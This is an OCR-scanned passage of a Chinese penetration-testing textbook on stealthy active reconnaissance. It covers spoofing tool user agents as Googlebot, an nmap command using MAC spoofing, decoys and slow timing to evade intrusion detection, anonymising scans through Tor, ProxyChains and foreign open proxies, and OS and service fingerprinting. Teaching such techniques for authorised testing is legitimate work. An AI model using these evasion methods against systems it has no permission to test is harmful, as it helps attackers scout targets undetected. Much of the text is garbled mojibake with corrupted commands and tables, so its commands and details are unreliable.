为 了 提高 提供 详细 的 主动 侦察 的 有 效 性 的 信息 ， 我 们 的 重点 将 是 使 用 隐形 的 、 不 易 察 觉 的 技术 。 


在 这 一 章 中 ， 你 将 学 到 : 
-隐形 扫描 策略 。 
-网 络 基础 设施 ， 发 现 主机 和 枚 举 主机 。 


综合 侦察 应 用 ， 尤 其 是 recon-ng。 
目标 漏洞 扫描 。 


3.1 SHAS 


逢 目标 皮 现 是 主动 侦察 的 最 大 风险 。 使 用 目标 机 器 的 时 间 、 数 据 邮 票 、 源 |P 地 址 及 其 他 附加 信息 ， 目 标 可 能 识别 出 侵入 侦察 


的 来 源 。 因 此 ， 及 用 隐形 技术 ， 可 以 将 被 友 完 的 概率 降 到 最 低 。 


3. 


SRA RUMSEY, WIA RE RSA Toa BLA: 


-伪装 工具 签名 来 逃避 检测 和 触发 警报 。 

将 攻击 隐藏 于 合法 流量 中 。 

-修改 攻击 ， 隐 藏 其 流量 的 来 源 和 类 型 。 

使 用 非 标 准 的 流量 类 型 或 加 密 来 使 攻击 隐形 。 


隐形 扫 摘 扩 术 包括 或 全 部 包含 以 下 几 个 方面 : 
.调整 源 IP 栈 和 工具 识别 设置 。 
-修改 数据 包 的 参数 (nmap) 。 
.使 用 代理 的 匿名 网 络 (ProxyChains 和 Tor 网 络 )。 


— 


1 调整 兰 IP 栈 和 工具 识别 设置 


在 渗透 测试 (或 攻击 ) 开始 测试 之 前 ， 它 必须 保证 禁用 或 天 闭 所 有 Kali 不 必要 的 服务 。 


例如 ， 如 果 本 地 正在 运行 不 是 必需 的 DHCP 守 护 进程 ， 那 么 DHCP 可 能 与 目标 系统 交互 ， 这 种 交互 可 能 会 被 记录 ， 并 且 发 送 


警报 到 目标 的 管理 员 。 


大 多 数 测 试 人 员 还 在 测试 系统 上 禁用 IPv6。 这 将 停止 目标 网 络 上 的 IPv6， 并 首先 确保 所 有 流量 通过 |Pv4 代 理 路 由 。 禁 用 IPv6 


可 以 通过 编辑 /etc/sysctl.conf 文 件 完成 ， 文 件 中 包括 以 下 几 行 代码 : 


#disable ipv6 
net.ipv6.conf.all.disable ipv6é = 1 
net.ipv6.conf.default.disable ipvó = 1 
net.ipv6.conf.lo.disable = 1 


一 些 商 业 和 开源 工具 (例如 ，Metasploit 框 架 ) 用 一 个 标识 序列 标记 它们 的 数据 包 。 虽 然 ， 这 可 能 对 测试 后 分 析 系 统 的 事 


件 日 志 很 有 用 (由 一 个 特定 的 测试 工具 友 起 的 事件 可 以 直接 与 系统 的 事件 日 志 进 行 比较 ， 用 于 确定 网 络 侦 测 情况 并 响应 攻击 。 


) 


， 但 是 它 也 可 能 触 友 某 些 入 侵 检 测 系 统 。 测 试 你 的 工具 ， 用 它 来 攻击 一 个 实验 系统 ， 确 定 被 标记 的 数据 包 ， 并 且 要 么 改变 标 


人 党， 要 么 小 心 使 用 工具 。 


识别 标签 有 最 简单 的 方法 ， 使 用 工具 在 虚拟 目标 系统 上 创建 新 的 应 用 ， 然 后 查看 系统 日 志 中 与 工具 名 称 相关 的 记录 。 此 外 ， 


使 用 Wireshark 捕 获 攻 击 者 和 目标 虚拟 机 之 间 的 信息 沈 ， 然 后 搜索 抓 包 (packet capture) 文件 ， 寻 找 由 测试 工具 产生 的 那些 关 
键 字 (工具 的 名 称 、 供 应 商 、 证 书 序列 号 等 ) ， 也 是 一 种 有 效 的 方法 。 


a 


在 Metasploit 框 架 中 的 用 户 代 理 (UserAgent) ， 可 以 通过 修改 http form field 选 项 改变 。 在 msfconsole 提 示 下 ， 使 用 


uxiliary/fuzzers/http/http form _ field 选择 选项 ， 然 后 设置 一 个 新 的 用 户 代 理 ， 如 图 3.2 所 示 。 

msf > use auxiliary/fuzzers/http/hnttp form field 

msf auxiliary(http form field) > set UserAgent 

UserAgent => Mozilla/4.0 (compatible; MSIE 6.0; Windows NI 5.1) 

mst auxiliary(http form field) > set UserAgent Googlebot/Z.l (+http://www.google 


.com/bot.html) 
UserAgent => Googlebot/2.1 («http://www.google.com/bot.html) 
msf auxiliary(ht1 field) > 


图 3.2 ”设置 新 用 户 代理 


在 本 实例 中 ， 用 户 代理 被 设 定 为 谷歌 的 索引 虹 蛛 程序 一 Googlebot。 这 是 一 种 常见 的 自动 化 应 用 程序 ， 访 问 和 索引 网 


站 ， 很 少 引起 网 站 所 有 者 的 注意 。 


Say: 的 用 户 代 理 ， 参 考 实例 ， www.useragentstring.com. 


3.1.2 ”修改 数据 包 参 数 
用 的 方法 是 对 目标 友 动 扫 描 一 一 发 送 定 义 的 数据 包 到 目标 ， 然 后 利用 返回 的 数据 包 来 获取 信息 。 这 种 类 型 


i 


主动 侦察 最 常 
常用 的 工具 是 网 络 映射 器 (Network Mapper, nmap) 。 

为 了 有 效 使 用 nmap， 必 须 拥 有 root 级 别 的 权限 。 这 是 典型 的 应 用 程序 操作 的 数据 包 ， 也 是 Kali 上 默认 以 root 级 别 启动 的 原 
Al. 


当 试 图 减少 检测 ， 用 一 些 隐形 拉 术 来 避免 检测 并 随后 报警 ， 包 括 以 下 内 容 : 


训 试 之 前 确定 扫描 的 目标 ， 发 送 需 要 确定 目标 的 最 小 数量 的 数据 包 。 例 如 ， 如 果 你 想 确 认 一 个 虚拟 主机 的 存在 ， 


基于 Wep 服 务 的 默认 端口 是 开放 的 。 
-避免 可 能 与 目标 系统 连接 的 扫描 ， 避 免 可 能 泄漏 数据 的 扫描 。 不 要 ping 目 标 ， 或 使 用 同步 (SYN) 和 非常 规 数据 包 扫 描 ， 如 确认 (ACK) 、 
完成 (CFIN) 和 复位 (RST) 数据 包 。 


随机 化 或 欺骗 分 组 设置 ， 如 源 IP 和 端 
调节 定时 以 减缓 目标 端的 包 的 到 来 。 
通过 包 的 分 解 或 附加 随机 数据 来 改变 数据 包 大 小 ， 
例如 ， 如 果 你 想 进行 一 次 隐形 扫 摘 并 且 做 最 小 化 的 侦 测 ， 可 以 使 用 以 下 nmap 命 令 : 

#nmap --spoof-mac- Cisco --data-length 24 -T paranoid -max-hostgroup 
l - max-parallelism 10 -PN -Ë -D 10.1.20.5,RND:5,ME --v -n -s5 
-sV-oA /desktop/pentest/nmap/out -p T:1-1024 
-random-hosts 10.1.1.10 10.1.1.15 


首先 需要 确定 80 端 口 ， 这 个 


口 地 址 ， 以 及 MAC 地 址 。 


以 此 混 消 设 备 对 数据 包 的 检 训 。 


表 3.1 详 细 和 解释 了 前 面 的 命令 。 


fpe 说 明 
伪造 MAC 地 址 匹配 思科 (Cisco) 产品 。 用 0 更换 Cisco 将 创建 一 个 完全 随机 的 


--spoof-mac-Cisco 
MAC 地 址 


--data-length 24 Ke BUETE ARAL, BHOND24 5€ 1 EN BL 
-T paranoid 将 时 间 设 置 为 最 慢 ， 设 置 paranoid 
-- max-hostgroup Pee fill EALER TY [n] 823-338 


限制 发 送 有 效 探 针 的 数量 。 你 也 可 以 使 用 --scan-delay 选项 ， 设 置 两 个 探 针 之 间 的 停 


-- max-parallelism n. cae toes op: eq ec 
du: 然而 ， 此 选项 与 --max-parallelism Jil 4^ 3fE 7$ 


-PN T T pee WET SAS GCF) HET GAS ) 
-ft [| 做 Fray Sa 4. BORD AY aio (用 户 ) 和 不 正确 配置 的 入 侵 检测 系统 
-D 10.1.20.5, RND:5.ME a i 但 扫描 ， 与 攻击 者 的 扫 撒 同时 运行 ， 隐 藏 实际 攻击 


没有 DNS 解析 ; 内 部 或 外 部 DNS IRI AS, 不 响应 通过 NMAP 提交 的 DNS 信息 查 


* i. EAA Aes ida, re —— 应 该 被 禁用 

-SS 进行 隐形 的 TCP SYN 扫描 ， 并 不 需要 完整 的 TCP 握手 。 其 他 扫描 类 型 (例如 ， 空 扫 
fii) 也 可 以 使 用 ， 但 是 ， res ae zx RA rU Tr e 

-sV 司 用 版 本 检测 

-oA /desktop/pentest/nmap Ties Wn th ON ak GOES. greppable 和 XML ) 

-p T:1-1024 扫描 指定 的 TCP $m O 

-- random-hosts BENLE A fp 3-SBLBSUX FE 


IM, MAIS elie—MEBS SAS, Kat RASS i. 7AM, MRSA TTEA. (BAS, tnIBéUks| 
目标 的 注意 ; 因此 ， 许 多 测试 者 和 攻击 者 利用 匿名 网 络 ， 尽 量 最 小 化 侦 测 。 


3.1.3 ”使 用 匿名 网 络 代理 (Tor 和 Privoxy) 


Tor 是 第 三 代 洋 葱 路 由 (www.torproject.org) ， 开 源 软 件 ， 提 供 免费 接 入 的 匿名 网 络 代理 。 洋 萄 路 由 加 密 用 户 济 量 使 网 络 
匿名 ， 并 通过 一 系列 的 洋葱 路 由 器 友 送 匿名 流量 。 在 每 一 个 路 由 器 ， 解 密 加 密 信息 ， 得 到 路 由 信息 ， 然 后 在 友 送 该 消息 到 下 一 个 
证 各 。 它 被 比喻 为 逐步 剥 除 洋 慈 ， 故 以 此 命名 。 它 通过 保护 用 户 的 IP 流 的 源 地 址 和 目的 地 址 ， 抵 御 流 量 分 析 的 攻击 。 


在 这 个 例子 中 ,使 用 Tor 的 Privoxy 代 理 服务 器 ， 一 个 非 高 速 缓存 的 Web 代 理 ， 位 于 与 因特网 通信 的 应 用 程序 的 中 | 间 ， 利 用 
先进 的 过 滤 拉 术 ， 保 护 用 尸 隐私 、 移 除 广 告 ， 并 将 潜在 的 恶意 数据 发 送 给 测试 者 。 


安装 Tor， 请 执行 下 列 步骤 : 

1. 首 先 执行 apt-get update 和 apt-get update 命 令 ， 然 后 运行 下 面 的 命令 : 
apt-get install tor 

2. 一 旦 安装 了 Tor， 编 辑 位 于 /etc 目 录 下 的 proxychains.conf 文 件 。 


该 文件 规定 了 使 用 在 Tor 网 络 系统 上 的 测试 系统 使 用 代理 服务 器 的 数量 和 顺序 。 代 理 服 务 器 可 能 停止 工作 ， 或 者 它们 可 能 遇 
到 重 载荷 (导致 缓慢 或 潜 连 接 ) ; 如 果 友 生 这 种 情况 ， 该 文件 定义 的 proxychain 将 失效 ， 因 为 预期 链 路 正在 消失 。 因 此 ， 茶 
使 用 strict chains， 并 且 启 用 dynamic_ chains， 这 就 保证 了 连接 将 被 路 由 ， 如 图 3.3 所 示 。 


|# proxychains.conf VER 3.1 
2# 

3# HTTP, SOCKS4, SOCKSS tunneling proxifier with DNS. 
fl 

os The option below identifies how the ProxyList is treated. 

i only one option should be uncommented at time, 

34 otherwise the last appearing option will be accepted 

J # 
TS dynamic chain 
11# 

123 Dynamic - Each connection will be done via chained proxies 


l3# all proxies chained in the order as they appear in tne list 
143 at least one proxy must be online te play in chain 

153 (dead proxies are skipped) 

153 otherwise EINIR is returned to the app 

LAF 

le#strict chain 

13 4 

eo# Strict - Each connection will be done via chained proxies 


214 all proxies chained in the order as they appear in tne list 
2 F All proxies must be online to play in chain 
23 # otherwise EINTR is returned to the &pp 


图 3.3 £25 ## proxychains.conf 文件 


3. 接 下 来 ， 编 辑 [ProxyList] 部 分 ， 以 确保 socks5 代 理 人 存在 ， 如 图 3.4 所 示 。 


50 [ProxyList | 
|# add proxy here ... 
52 4 meanwile 
5348 defaults set to tor 
54socks4 127.0.0.1 9050 
socks5 127.0.0.1 9050 


图 3.4 28 HE [ProxyList] 


在 网 上 很 容易 找到 开放 代理 ， 并 添加 到 proxychains 文 件 中 。 测 试 人 员 可 以 利用 这 一 优势 ， 进 一 步 模糊 目 己 的 身份 。 例 如 ， 
如 果 有 报道 说 某 一 个 国家 或 社区 的 IP 地 址 一 直 受 到 网 络 攻击 ， 寻 找 本 地 的 开放 代理 ， 并 将 它们 添加 到 你 的 列表 ， 或 单独 配置 一 个 
文件 。 


4. 从 终 闹 窗口 局 动 Tor 服 务 ， 请 输入 以 下 命令 : 


root@kali:-~# service tor start 


5. 使 用 下 面 的 命令 验证 Tor 已 经 启动 : 
root@kali:~# service tor status 
6. 验 证 Tor 网 络 正 在 工作 ， 并 提供 匿名 连接 是 很 重要 的 。 首 先 确认 你 的 源 IP 地 址 ， 从 终端 输入 以 下 命令 : 


root@kali:~# iceweasel www.whatismyip.com 


这 将 局 动 lceweasel 浏 览 器 并 打开 一 个 网 站 ， 提 供与 网 页 连接 的 源 IP 地 址 。 注 意 IP 地 址 ， 然 后 ， 使 用 以 下 的 proxychains 命 
令 调 用 Tor 路 由 : 


root@kali:~# proxychainsiceweasel www.whatismyip.com 


TEGIS ESCAR, |PIBLEAEBTEIIO.47.226.60, MAANA APRA, T ESIECEATortHETT Men, We 
3.5Brzn. 


NetRange: 96.47.226.16 - 96.47.226.23 

CIDR: 96.47.226.16/29 

OriginAS: 

NetNames : TOR-MIAOI 

NetHandle: NET -96-47-226-16-1 

Parent: NET -96-47-224-0-1 

NetType: Reallocated 

Comment : SSS SS SSS SSS SS SSS SS SSS SSS SS SS SS SS SSS SS SSS SSS SS SSS SS SSS 
Comment : This is a Tor Exit Node operated on behalf of the Tor 
Comment : Project. Tor helps you defend against network 

Comment : surveillance that threatens personal freedom anc 
Comment : privacy. You can learn more now at www.torproject.org 
Comment : SOC TS SSS TTS SS ST SA TS ITN A ST 


图 3.5 ”查询 节点 的 截图 
通过 访问 https://check.torproject.org， 你 也 可 以 验证 Tor 的 功能 是 否 正 常 。 


虽然 通信 使 用 Tor 网 络 现 在 受到 保护 ， 但 当 你 的 系统 使 DNS 请 求 提 供 你 的 身份 到 |SP 时 ，DNS 可 能 发 生 港 漏 。 你 可 以 检查 
DNS 漏洞 ， 地 址 为 : www.dnsleaktest.com, 


当 你 测试 一 个 DNS 汇 漏 时 ， 在 美国 Kali 代 理 配置 链 的 源 I|P 地 址 默认 值 是 一 个 3 级 通信 (Level 3 Communications) 服务 器 的 
地 址 ， 见 图 3.6。 这 提供 了 对 测试 者 身份 的 额外 保护 。 


Your DNS test results 


This page shows the ONS Servers thatyour computer is using to resolve ONS names. The owners of the Servers listed below have the ability to 
log the names of all websites you connectto. 


WARNING: If you are connected to a VPN Service and ANY of the servers listed below are not provided by the VPN service then your ONS may be 
leaking. (You Should be able to recognise them based on the hostname, ISP and locaton). This is nat an issue if you trustthe owners of these 
servers with your private data. 


We detected the 2 DNS servers listed below. 


192 221.144.192 
192 221.144.192 


Level 3 Communications 


United States L= 


192.221.144.109 
Hostname: 192.221.144.109 


ISP: Level 3 Communications 


Country: United States 


图 3.6 DNS 测试 结果 
大 多 数 命令 行 可 以 在 使 用 Proxychains 访 问 Tor 网 络 的 控制 平台 上 运行 。 


在 使 用 Tor 时 ， 要 丰 记 如 下 注意 事项 : 


Tor 提 供 匿 名 服务 ， 但 它 不 能 保证 隐私 。 出 口 节 点 的 业主 都 能 够 嗅 出 流量 ， 也 有 可 能 会 访问 用 户 的 凭据 。 
在 Tor 浏 览 器 套件 中 的 漏洞 ， 据 称 被 执法 部 门 用 于 探测 系统 并 获取 用 户 信息 。 
-ProxyChains 不 处 理 UDP 流 量 。 


. 某 些 应 用 程序 和 服务 无 法 在 这 样 的 环境 下 运行 ， 实 际 上 ，Metasp]loit 与 nmap 可 能 不 能 运行 。nmap 的 隐身 SYN 扫 描 被 proxychains 终 止 ， 且 
连接 扫描 被 调用 时 ， 这 可 能 会 泄漏 信息 。 


: 某 些 浏览 器 的 应 用 程序 (Activex, PDF. Flash. Java. RealPlayflQuickTime) ， 可 能 用 于 获取 你 的 IP 地 址 。 


.确保 浏览 之 前 清理 了 你 的 cookies。 


nor_Bugay 脚 本 允许 你 控制 Tor IP 地 址 刷新 频 紊 ， 但 是 目 动 识别 用 户 的 信息 非常 困难 
(http://sourceforge.net/projects/linuxscripts/files/Tor-Buddy/) 。 


3.2 ”识别 网 络 基础 设施 


一 旦 测试 者 的 身份 已 被 保护 ， 扫 摘 网 络 关 键 的 第 一 步 融 是 确定 在 网 络 上 的 因特网 可 接 入 部 分 的 委 置 。 


Whats ait A AEX EERE PILA: 

-确定 可 能 混淆 设备 《负载 平衡 器 ) 或 消除 〈 防 火 墙 和 分 组 检查 设备 ) 测试 结 
-识别 已 知 漏洞 的 设备 。 

-继续 实施 隐形 扫描 来 识别 设备 。 

-获得 目标 的 理解 ， 重 点 是 安全 体系 结构 和 一 般 安全 。 


跟 路 路 由 (traceroute) 提供 了 关于 包 过 滤 能 力 的 基本 信息 ; Kali 的 一 些 其 他 应 用 包括 的 内 容 如 表 3.2 所 示 。 


#3.2 Kali 的 一 些 常见 应 用 


应 用 描述 


Ibd 使 用 基于 DNS 和 HTTP BT ROREM HOP a at CULPA 3.7 ) 

miranda.py tif acad A AY BD EHE SI UPNP te 

nmap 检测 设备 、 确 定 操作 系统 及 其 版 本 

SHODAN 基于 Web 的 搜索 引擎 识别 连接 到 互联 网 的 设备 ， 包 括 那些 默认 密码 、 已 知 错 误 和 漏洞 等 


下 图 显示 的 是 运行 在 lbd 脚 本 上 的 针对 谷歌 的 结果 ; 你 可 以 看 到 ， 合 歌 在 它 的 网 站 上 同时 使 用 DNS- 久 载 平衡 与 HTTP- 负 载 
平衡 。 从 一 个 渗透 测试 者 的 角度 来 看 ， 这 些 信 息 可 以 用 来 解释 为 什么 得 到 的 是 杂 散 的 结果 ， 因 为 负载 平衡 器 作为 一 个 特定 的 工 
具 ， 将 活动 从 一 个 服务 器 转移 到 另 一 个 。 

Checking for DNS-Loadbalancing: FOUND 
www.google.ca has address 1/3.194.43.8/ 


www.google.ca has address 173.194.43.88 
www.google.ca has address 173.194.43.95 


Checking for HTTP-Loadbalancing [Server]: 


BFE/2.8 
qws 
FOUND 


Checking for HIIP-Loadbalancing [Date]: 15:48:26, 15:48:2/, 15:48:27, 15:46:2/, 
15:48:28, 15:48:28, 15:48:29, 15:48:29, 15:48:29, 15:48:30, 15:48:30, 15:48:31, 
15:48:31, 15:48:31, 15:48:32, 15:48:32, 15:48:32, 15:48:33, 15:48:33, 15:48:33, 
15:48:34, 15:48:34, 15:48:35, 15:48:35, 15:48:36, 15:48:35, 15:48:36, 15:48:37, 
15:48:3/, 15:48:37, 15:48:38, 15:48:38, 15:48:40, 15:48:41, 15:48:41, 15:48:41, 
15:48:42, 15:48:42, 15:48:42, 15:48:43, 15:48:43, 15:48:44, 15:48:44, 15:48:44, 
15:48:44, 15:48:45, 15:46:45, 15:48:46, 15:48:46, 15:48:46, NOT FOUND 


Checking for HITP-Loadbalancing [Diff]: FOUND 
> Location: http://www.google.ca/?gfe rd-ctrl&ei-4YEgU/LoBaGCBQfq44G4Dg&gws rd=c 


Content-Length: 258 
Server: GFE/2.0 
> P3P: CP=" [his is not a P3P policy: See http://www.google.com/support/accounts/ 
bin/answer.py?hl-zen&answerz15165/ for more info." 
> Server: gws 
> Content-Length: 27 
> K-XSS-Protection: 1; mode=block 
> K-Frame-Options: SAMEORIGIN 


= 
< Location: http://www.google.ca/?gfe rd-cr&ei-4IEgUSmrK8zY8geTLIGgDw 
e 
= 


www.google.ca does Load-balancing. Found via Methods: DNS HITP[Server] HITP[Diff 
] 


图 3.7 针对 Google 的 测试 结果 


3.3” 枚 举 主 机 


主机 枚 举 是 获得 特定 主机 的 特定 细节 的 过 程 。 主 机 枚 举 不 知道 一 个 服务 器 或 无 线 接 入 点 的 存在 ; HBR, PSEA i 
口 、 基 本 操作 系统 、 运 行 的 各 种 服务 、 各 种 应 用 等 内 容 ， 来 不 断 扩 大 攻击 面 。 


这 具有 高 度 的 侵入 性 ， 除 非特 别 小 心 ， 否 则 主动 侦察 将 被 目标 系统 检测 到 ， 并 且 作 记录 。 


友 现 活动 的 主机 


第 一 步 是 运行 针对 目标 地 址 空间 的 网 络 ping 扫 摘 并 寻找 答复 ， 特 别 的 信息 会 表明 一 个 特定 的 目标 是 活动 的 、 有 能 力 应 答 
的 。 从 历史 经 验 看 ，ping 侦 测 主要 使 用 ICMP; 当然 ， TCP、UDP、ICMP 和 ARP 通 信也 可 用 于 鉴定 主机 的 活动 情况 。 


各 种 扫描 器 可 以 通过 Internet 远 程 位 置 运行 ， 用 来 确定 主机 的 活动 性 。 虽 然 主 扫描 器 是 nmap， 但 Kali 提 供 的 另外 几 种 应 用 
也 是 有 用 的 ， 如 表 3.3 所 示 。 


表 3.3 ”Kali 提 供 的 几 种 扫描 应 用 


w 用 描述 
alive6 和 detect-new-ip6 IPv6 主机 检测 。detect-new-ip6 运行 在 基础 脚本 上 ， 确定 新 IPv6 设备 的 加 入 
(经 ) 
应 用 Ti Y 
dnmap 和 nmap nmap 是 标准 的 网 络 枚 人 举 工 具 。dnmp 是 一 种 分 布 式 客户 端 一 服务 六 模式 ， 实 现 
nmap JH NAT 
PBNJ 将 nmap RTT REAGE EP., HE T ETH TER EHL 


fping, hping2, hping3 fll nping eH LP. HEFP IAI Ate, üüx ERLA E SIE OU 


对 于 渗透 测试 者 或 攻击 者 ， 从 活动 主机 返回 的 数据 ， 将 用 来 确定 活动 目标 为 攻击 目标 。 


民利 行 渗透 测试 的 同时 ， 运 行 多 个 主机 发 现 扫描 。 茶 些 设备 可 能 是 时 间 相 关 的 。 在 一 次 渗透 测试 中 ， 人 及 现 系统 管理 员 在 正常 工作 时 间 结 束 
后 ， 建 芯 了 与 洲 戏 服务 器 的 连接 。 因 为 洲 戏 服务 器 不 是 一 个 经 批准 的 商业 系统 ， 委 理 员 没有 投 照 正 入 的 过 程 来 你 护 服务 右 ;， 在 其 上 及 现 了 多 个 
它们 并 没有 打上 必要 的 安全 补丁 。 测 试 人 员 能 够 攻击 游戏 服务 右 ， 在 管理 员 的 游戏 服务 器 中 ， 使 用 漏洞 并 获得 企业 网 络 的 砌 层 接 


3.4 wO., BY FASTA 


Kali 提 供 了 几 种 不 同 的 有 用 工具 ， 用 于 识别 远程 主机 上 的 开放 闯 口 、 操 作 系 统 和 安 妆 的 服务 。 这 些 功能 大 多 可 以 使 用 nmap 
完成 。 尽 管 我们 将 专注 于 利用 nmap 的 例子 ， 但 基本 原则 也 适用 于 其 他 工具 。 


3.4.1 mL 


刑 口 扫 拉 是 连接 到 TCP 和 和 UDP 端口 ， 以 确定 何 种 服务 、 何 种 应 用 程序 在 目标 设备 上 运行 的 过 程 。 在 每 个 系统 上 的 TCP 和 UDP 
有 65535 个 端口 。 某 些 端 口 已 知 与 特定 服务 相关 联 (TCP 20 和 TCP 21 是 用 于 文件 传输 协议 服务 (FTP) 的 通用 端口 ) 。 前 1024 
个 是 众所周知 的 疡 口 ， 并 且 主 要 定义 的 服务 在 此 学 围 内 的 痕 口 上 运行 ; IANA 保 留 了 接受 服务 和 其 他 闹 口 


(http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml) 。 


Ran 对 一 些 特定 的 服务 存在 接收 端 iH 如 80 端 口 为 基于 网 络 的 流量 的 接受 端口 ， 但 是 ， 服 务 可 oc 任何 端口 。 此 选项 通常 用 于 隐 
zin: 的 服务 ， 特 别 是 如 果 已 知 该 服务 是 易 受 攻击 的 - 然而 ， 如 果 攻 击 者 完成 端口 扫描 ， 并 没有 找到 一 个 预期 的 服务 ， 或 发 现 它 使 用 了 一 个 不 
第 的 端口 ， 他 们 将 被 提示 作 进 一 步调 查 。 


通用 端口 映射 工具 nmap 依 靠 活动 栈 指纹 。 特 制 的 数据 包 被 友 送 到 目标 系统 ，nmap 以 操作 系统 对 这 些 数据 包 的 啊 应 来 识别 
这 些 操作 系统 。 为 了 使 Wmap 正 党 工作 ， 至 少 须 有 一 个 监听 端口 是 开放 的 ， 而 操作 系统 必须 是 已 知 和 有 指纹 的 ， 还 有 ， 该 指纹 的 


副本 必须 在 本 地 数据 库 。 
将 nmap 用 于 端口 友 现 是 有 很 大 的 吕 a 声 的 ， 将 被 网 络 安全 设备 检测 并 记录 。 要 记 住 的 几 点 如 下 : 


-攻击 和 渗透 测试 侧重 于 隐形 找 术 ， 测 试 只 注意 测试 的 端口 ， 那 么 ， 将 影响 他 们 锁定 目标 的 杀 链 。 如 末 他 们 已 经 发 起 了 对 Web 服 务 占 的 漏洞 的 
攻击 ， 他 们 将 寻求 目标 的 80 端 口 或 8080 端 口 进 入 访问 。 


大 多 数 端 口 扫 描 器 都 有 一 个 默认 扫描 列表 ， 前 提 是 相信 你 知道 什么 在 名 单 上 ， 什 么 被 省 略 。 同 时 考虑 TCP 端 口 和 UDP 端口 。 


:成功 的 扫描 需要 TCP/IE 及 相关 协议 的 次 度 知 识 、 网 络 和 一 些 工 作 的 特殊 工具 。 例 如 ，SCTP 是 网 络 上 一 个 越 来 越 普 遇 的 协议 ， 但 它 在 企业 网 
络 测试 时 ， 很 少 使 用 。 


-即使 慢 慢 来 ， 痛 口 扫 描 也 会 影响 网 络 。 对 一 些 较 旧 的 网 络 设备 ， 以 及 供应 商 的 一 些 特 定 设备 ， 在 接收 到 痛 口 扫描 时 会 锁定 ， 从 而 把 扫 朱 转换 
为 一 个 拒绝 服务 攻击 。 


用 来 扫描 一 个 端口 的 工具 ， 尤 其 是 nmap， 正 在 扩展 常规 的 功能 。 它 们 也 可 以 用 来 检测 漏洞 ， 甚 至 利用 简单 的 安全 漏洞 。 
3.4.2 ”指纹 识别 操作 系统 


确定 远程 系统 的 操作 系统 类 型 ， 使 用 两 种 类 型 的 扫 摘 : 


-主动 指纹 识别 〈RActive fingerprinting) : 攻击 者 通过 友 送 正常 的 和 有 异 第 的 数据 包 到 目标 系统 ， 记 录 它 们 的 反应 模式 ， 称 其 为 指纹 
(fingerprint) 。 将 指纹 与 本 地 数据 库 比 较 ， 操 作 系 统 可 被 确定 。 


-被 动 指纹 识别 (Passive fingerprinting) : 攻击 者 唱 探 ， 或 记录 和 分 析 数 据 包 流 ， 以 确定 该 分 组 的 特性 。 


主动 指纹 比 被 动 指纹 更 快 、 更 准确 。 在 Kali 中 ， 有 两 个 主要 的 主动 工具 是 nmap 和 xprobe2。 


nmap 工 具 注 入 数据 包 到 目标 网 络 ， 并 分 析 它 收 到 的 响应 。 在 图 3.8 中 ，-O 标 志 命 令 nmap 确 定 操作 系统 。 因 为 它 注入 分 组 
到 目标 ， 通 过 nmap 的 判定 操作 系统 的 精度 是 基于 开放 端口 的 数目 。 从 UNIX 系 统 区 分 Windows 通 常 是 有 效 的 ， 但 是 它 不 能 提供 
非常 具体 的 信息 ， 如 各 种 UNIX 的 内 核 区 分 。 图 3.8 显 示 了 nmap 对 Windows 系 统 的 扫描 结果 。 只 有 在 目标 系统 上 的 几 个 并 口 可 用 
于 测试 ， 所 以 无 法 区 分 Windows 7 企业 版 和 Windows XP SP3, 


root@kali:-# nmap -SS -0 173.231. 


starting Nmap 6.40 ( http://nmap.org ) at 2014-03-11 15:55 EDT 

Nmap scan report for IP-1/3-231- 

Host is up (0.29s Latency). 

Not shown: 854 closed ports, 44 filtered ports 

PORT SIATE SERVICE 

23/tcp open telnet 

80/tcp open http 

Device type: general purpose 

Running: Microsoft Windows /|XP 

0S CPE: cpe:/o:microsoft:windows /:::enterprise cpe:/o:microsoft:windows xp::sp3 
Us details: Microsoft Windows / Enterprise, Microsoft Windows XP SP3 


图 3.8 ”使 用 nmap - 〇 的 屏幕 截图 


一 个 相关 的 程序 ，xprobe2 使 不 同 的 TCP、UDP 和 ICMP 数 据 包 绕 过 防火 墙 ， 避 免 被 IDS/IPS 系 统 检 测 。xprobe2 还 使 用 模糊 
模式 匹配 : 未 识别 操作 系统 被 确定 为 一 种 类 型 ; 相反， 被 分 配 为 几 个 可 能 的 变 体 之 一 。 正 如 你 在 图 3.9 中 看 到 的 ， 这 使 得 测试 者 
能 测试 特定 操作 系统 变种 的 漏洞 ; 这 种 特殊 性 会 增加 成 功 的 机 会 ， 并 最 大 限度 地 减少 使 用 错误 工具 可 能 发 生 的 攻击 错误 。 


[+] Primary guess: 


[*] Host 199.181. Running OS: "HP UX 11.0x" (Guess probability: 95%) 
[+] Other quesses: 

[+] Host 199.181. Running OS: "OpenBSD 3.4" (Guess probability: 90%) 
[+] Host 199.181. Running OS: "OpenBSD 3.5" (Guess probability: 90%) 
[+] Host 199.181. Running OS: "OpenBSD 3.6" (Guess probability: 90%) 
[+] Host 199.161. Running 05: "OpenBSD 3./" (Guess probability: 90%) 
[*] Host 199.181. Running OS: "Cisco IOS 11.2" (Guess probability: 86%) 


图 3.9 ”减少 错误 


注意 ， 对 目标 系统 隐藏 真实 操作 系统 是 简单 的 。 因 为 指纹 软件 依赖 于 分 组 包 设置 ， 如 生存 时 间或 初始 窗口 大 小 ， 改 变 这 些 值 
或 其 他 用 户 可 配置 的 设置 ， 可 以 改变 工具 的 结果 。 有 些 组 织 积极 改变 这 些 值 ， 使 侦察 的 最 后 阶段 更 加 困难 。 


3.4.8 ”确定 主动 服务 


侦察 的 枚 举 部 分 的 最 终 目标 是 确定 运行 在 目标 系统 上 的 服务 和 应 用 。 如 果 可 能 的 话 ， 攻 击 者 想 知 道 服务 类 型 、 供 应 商 、 证 
书 ， 便 于 确定 具体 的 漏洞 。 


下 面 是 用 于 确定 主动 服务 的 几 种 近 术 : 


-从 定 默认 的 站 口 和 服务 : 如 果 远 程 系统 被 标识 为 微软 操作 系统 打开 服务 端口 80 (WwW 服务 ) ， 攻 击 者 可 能 会 认为 默认 安装 的 是 微软 IIS 服 
务 器 。 进 一 步 的 测试 将 被 用 来 验证 这 种 假设 Cnmap) o 
.标志 提取 : 完成 该 任务 ， 使 用 amap、netcat、nmap 和 远程 登录 等 工具 。 


:审查 默认 网 页 : 一 些 应 用 程序 安装 使 用 默认 的 管理 、 错 误 或 其 他 页 面 。 如 果 攻 击 者 访问 这 些 页 面 ， 他 们 会 提供 安装 应 用 程序 的 指导 ， 这 可 能 
是 攻击 的 漏洞 。 在 图 3.10 中 ， 攻 击 者 可 以 很 容易 地 识别 已 经 安装 在 目标 系统 上 的 Apache Tomcat 的 版 本 。 


Home Documentation Configuration Examples Wiki Mailing Lists Find Help 
Apache Tomcat/7.0.32 Be Software Foundation 


http://www.apacha.org/ 


Recommended Reading: | Server Status | 


